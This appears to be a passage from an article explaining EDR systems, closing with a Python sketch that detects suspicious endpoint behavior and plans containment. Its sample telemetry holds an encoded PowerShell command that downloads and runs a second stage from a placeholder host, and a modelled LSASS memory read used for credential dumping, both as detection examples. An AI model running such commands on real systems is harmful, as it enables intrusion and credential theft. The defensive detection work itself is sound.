Monitor and update regularly. Organizations should continuously monitor their endpoint activity and ensure their EDR software is updated with the latest threat intelligence and patches.
EDR is primarily concerned with endpoints, which can be any computer system in a network, such as end-user workstations and servers. EDR products support most operating systems, including Windows, macOS, Linux and BSD (Berkeley Software Distribution), but they monitor the host itself rather than the network.
An EDR system gathers information from many sources, including endpoints, firewalls, network scans and internet logs. Security vendors also offer EDR as part of a SIEM package, enabling a security operations center to investigate and respond to threats.
EDR is an integral part of a complete information security posture. It isn't antivirus software, but it may have antivirus capabilities or consume data from a separate antivirus product. Antivirus software is primarily responsible for blocking known malicious software, usually by signature. A well-executed EDR program, on the other hand, detects malicious behavior as it happens, including exploits and techniques with no known signature, and supports the investigation during an active incident. That behavioral focus is what lets EDR detect fileless malware and attackers operating with stolen credentials, both of which traditional antivirus software can't stop.
The role of an EDR system falls broadly into two categories:
Because EDR capabilities vary from vendor to vendor, organizations researching EDR systems should carefully investigate the capabilities of any proposed system. They should also consider how well it integrates with their current endpoint security product and other security tooling.
EDR systems gather and organize data from endpoints, and then use that information to identify irregularities or trends. They draw on many data sources from an endpoint, including logs, performance monitoring information, file details, running processes and configuration data. A dedicated agent installed on the endpoint usually collects this data, or the system might rely on built-in operating system capabilities, such as native event and audit logging, and other helper programs.
EDR systems then organize and analyze the collected data. A client device might perform portions of this analysis, but generally a central system, whether a hardware appliance, a virtual server or a cloud service, performs these functions.
Simple EDR systems often only collect and display data, or aggregate it to show trends. Operators can find it difficult to follow raw data of this kind and to make decisions from it.
Advanced EDR systems use machine learning or artificial intelligence to automatically identify and alert on new and emerging threats. They might also use aggregate threat intelligence from the product vendor to better flag endpoint threats. Some systems map observed suspicious behavior to the MITRE ATT&CK framework, so analysts can recognize known attack patterns and see which stage of an intrusion a given alert represents.
EDR threat response capabilities help the operator take corrective action, diagnose further issues and perform forensic analysis. This supports issue tracking and helps identify malicious activity or otherwise aid an investigation. Forensic capabilities help establish timelines, identify affected systems after a breach, gather artifacts and inspect live memory on suspect endpoints. Combining historical and current situational data gives a fuller picture during an incident.
Some endpoint detection and response systems perform automated remediation, such as disconnecting a compromised endpoint, stopping compromised processes, or alerting the user or the information security group. They can also actively isolate or disable suspect endpoints or accounts. A good incident response system will also help coordinate teams during an active incident, reducing its impact.
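As an added illustration (not code from the original article or from any EDR vendor), the following Python sketch runs the three stages described above over a few constructed telemetry records: it parses JSON process events as an agent would ship them, correlates parent and child processes, decodes a PowerShell -EncodedCommand payload, maps each hit to a MITRE ATT&CK technique ID, and escalates a per-host containment action from the worst alert. The two detections correspond to the fileless-malware and stolen-credential cases mentioned earlier. The hostnames, paths, rule names, LSASS allowlist and severity-to-action table are all assumptions for the example.

```python
"""Toy EDR pipeline: ingest endpoint process telemetry, detect suspicious behavior,
map each hit to MITRE ATT&CK, and choose an automated containment action."""
import base64
import json

# --- Constructed sample telemetry (illustrative, not output of any real EDR agent) ---
# One JSON object per line, loosely modelled on process-creation and process-access events.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()  # -EncodedCommand is UTF-16LE base64

SAMPLE_TELEMETRY = "\n".join(json.dumps(e) for e in [
    {"host": "WS-017", "event": "process_create", "pid": 4012, "ppid": 3990, "user": "CORP\\jdoe",
     "image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"host": "WS-017", "event": "process_create", "pid": 4120, "ppid": 4012, "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED},
    {"host": "WS-017", "event": "process_access", "pid": 4120, "ppid": 4012, "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe",
     "granted_access": "0x1010"},  # PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION: typical dumping mask
    {"host": "WS-022", "event": "process_create", "pid": 880, "ppid": 600, "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
])

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Child interpreter -> ATT&CK sub-technique of Command and Scripting Interpreter (mshta is T1218.005).
INTERPRETER_TECHNIQUE = {"powershell.exe": "T1059.001", "pwsh.exe": "T1059.001",
                         "cmd.exe": "T1059.003", "wscript.exe": "T1059.005",
                         "cscript.exe": "T1059.005", "mshta.exe": "T1218.005"}
# Processes expected to open lsass.exe; assumed allowlist, tune per environment.
LSASS_ALLOWLIST = {"lsass.exe", "csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
SEVERITY_RANK = {"medium": 1, "high": 2, "critical": 3}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text):
    """Collection stage: one JSON record per line, as an agent would ship them."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (or common abbreviations); None if absent or malformed."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-encodedcommand", "-enc", "-ec"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def detect(events):
    """Analysis stage: correlate parent/child processes and flag behaviors mapped to ATT&CK IDs."""
    creates = {(e["host"], e["pid"]): e for e in events if e["event"] == "process_create"}
    alerts = []
    for e in events:
        image = _basename(e["image"])
        parent = creates.get((e["host"], e.get("ppid")))
        # Fileless pattern: an Office document spawning a script interpreter.
        if (e["event"] == "process_create" and parent is not None
                and _basename(parent["image"]) in OFFICE_APPS and image in INTERPRETER_TECHNIQUE):
            decoded = decode_encoded_command(e["cmdline"])
            alerts.append({"host": e["host"], "pid": e["pid"], "severity": "high",
                           "technique": INTERPRETER_TECHNIQUE[image], "rule": "office_spawns_interpreter",
                           "detail": decoded if decoded is not None else e["cmdline"]})
        # Credential theft pattern: an unexpected process reading LSASS memory.
        if (e["event"] == "process_access" and _basename(e["target_image"]) == "lsass.exe"
                and image not in LSASS_ALLOWLIST):
            alerts.append({"host": e["host"], "pid": e["pid"], "severity": "critical",
                           "technique": "T1003.001", "rule": "lsass_memory_access",
                           "detail": f"{image} opened lsass.exe with access {e['granted_access']}"})
    return alerts


def plan_response(alerts):
    """Response stage: escalate containment per host from the worst alert seen on it."""
    actions = {"medium": "notify_analyst", "high": "kill_process", "critical": "isolate_host"}
    plan = {}
    for a in alerts:
        entry = plan.setdefault(a["host"], {"severity": "medium", "action": actions["medium"],
                                           "pids": set(), "techniques": set()})
        entry["pids"].add(a["pid"])
        entry["techniques"].add(a["technique"])
        if SEVERITY_RANK[a["severity"]] >= SEVERITY_RANK[entry["severity"]]:
            entry["severity"] = a["severity"]
            entry["action"] = actions[a["severity"]]
    return plan


if __name__ == "__main__":
    hits = detect(parse_events(SAMPLE_TELEMETRY))
    for h in hits:
        print(f"[{h['severity']}] {h['host']} pid={h['pid']} {h['technique']} {h['rule']}: {h['detail']}")
    print(plan_response(hits))
```

The point of decoding the payload rather than alerting on the raw command line is that the analyst sees the download cradle itself, which is the kind of context a collect-and-display tool leaves the operator to work out by hand. Real products add many more rules and tune the allowlist and severity mapping per environment; the structure (collect, correlate, map to ATT&CK, act) is what the example is meant to show.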